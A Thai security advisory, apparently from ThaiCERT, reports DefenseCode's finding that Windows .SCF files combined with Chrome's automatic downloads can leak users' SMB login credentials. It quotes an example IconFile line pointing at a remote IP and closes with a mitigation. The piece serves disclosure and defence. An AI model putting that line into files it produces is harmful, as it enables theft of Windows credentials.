บั๊กใน Google Chrome ทำให้ผู้ใช้ Windows ถูกขโมยรหัสผ่านได้
นักวิจัยด้านความมั่นคงปลอดภัยจาก DefenseCode รายงานเทคนิคการโจมตีขโมยรหัสผ่านผู้ใช้งานระบบปฏิบัติการ Windows โดยใช้ไฟล์ .SCF และหากใช้เทคนิคนี้ร่วมกับความสามารถบางอย่างของเบราว์เซอร์ สามารถขโมยรหัสผ่านได้โดยที่ผู้ใช้ไม่รู้ตัว
ไฟล์ .SCF (Shell Command File) เป็นไฟล์ที่บรรจุคำสั่งพิเศษเพื่อใช้งานร่วมกับ Windows Explorer เช่น เปิดหน้าต่างใหม่ หรือย่อโปรแกรมทั้งหมดที่เปิดไว้แล้วโชว์หน้า Desktop ซึ่งไอคอน “Show Desktop” ที่อยู่ใน Windows เวอร์ชันเก่าก็เป็นตัวอย่างหนึ่งของการใช้งานไฟล์ .SCF (Microsoft ยังไม่มีเอกสารอย่างเป็นทางการที่อธิบายถึงรายละเอียดทางเทคนิคของไฟล์ .SCF)
ความพิเศษอย่างหนึ่งของไฟล์ .SCF คือสามารถใส่ข้อมูลเพื่อบอกให้ Windows แสดงผลไอคอนของไฟล์นี้โดยใช้ไอคอนจากไฟล์อื่นได้ เช่นเดียวกับไฟล์ .LNK หรือไฟล์ Shortcut ที่สามารถระบุไอคอนของไฟล์ได้ ก่อนหน้านี้ ไฟล์ .LNK สามารถระบุได้ว่าไอคอนของไฟล์จะใช้ไอคอนจากไฟล์อื่นในระบบหรือไฟล์จากเครือข่าย แต่หลังจากที่ความสามารถนี้ถูกใช้ในการโจมตีเพื่อสั่งให้เครื่องประมวลผลไฟล์มัลแวร์โดยอัตโนมัติ ทาง Microsoft ก็ได้ออกแพตช์แก้ไขให้ไฟล์ .LNK สามารถเรียกเรียกใช้ไอคอนจากไฟล์ในเครื่องได้เท่านั้นเพื่อป้องกันปัญหา อย่างไรก็ตาม แพตช์นี้ไม่ได้แก้ไขช่องโหว่ในไฟล์ .SCF ด้วย
ไฟล์ .SCF สามารถระบุได้ว่าให้เรียกใช้ไอคอนจากไฟล์อื่นในเครื่อข่าย โดยใส่ข้อมูลในส่วน IconFile เป็นที่อยู่ SMB (เช่น ใส่ IconFile=\\170.170.170.170\icon) ซึ่งหากไฟล์นี้เข้ามาอยู่ในระบบ แล้วถูกเปิดดูด้วย Windows Explorer ตัวระบบปฏิบัติการจะเชื่อมต่อไปยังไอพีที่ระบุไว้ในไฟล์โดยอัตโนมัติเพื่อดาวน์โหลดข้อมูลไอคอน โดยที่ผู้ใช้ไม่จำเป็นต้องเปิดไฟล์ .SCF หรือดำเนินการใดๆ
ยังไม่พบข้อมูลว่าช่องโหว่นี้สามารถใช้โจมตีในรูปแบบอื่นได้หรือไม่ (เช่น สั่งประมวลผลโปรแกรมโดยอัตโนมัติ) แต่อย่างน้อยนักวิจัยพบว่าสามารถใช้วิธีนี้ดักขโมยข้อมูลรหัสผ่านที่รับส่งในระหว่างการล็อกอินผ่าน SMB ได้ ยิ่งกว่านั้น นักวิจัยยังพบว่าการโจมตีด้วยวิธีนี้สามารถใช้ร่วมกับความสามารถของ Google Chrome ที่ในค่าเริ่มต้นจะดาวน์โหลดไฟล์มาลงในเครื่องโดยอัตโนมัติ ทำให้เมื่อผู้ใช้เปิดเข้าเว็บไซต์ที่มีสคริปต์ให้ดาวน์โหลดไฟล์ .SCF ตัวไฟล์จะเข้ามาอยู่ในเครื่องทันที (หากจะลบไฟล์ออกอาจต้อง restart เข้าไปลบผ่านระบบปฏิบัติการอื่น)
ปัจจุบันทาง Microsoft ยังไม่แก้ไขช่องโหว่ในไฟล์ .SCF ผู้ใช้อาจป้องกันเบื้องต้นโดยการตั้งค่า Google Chrome ให้สอบถามทุกครั้งก่อนดาวน์โหลดไฟล์
ข้อมูลเพิ่มเติม http://www.defensecode.com/whitepapers/Stealing-Windows-Credentials-Using-Google-Chrome.pdf
ที่มา : Thaicert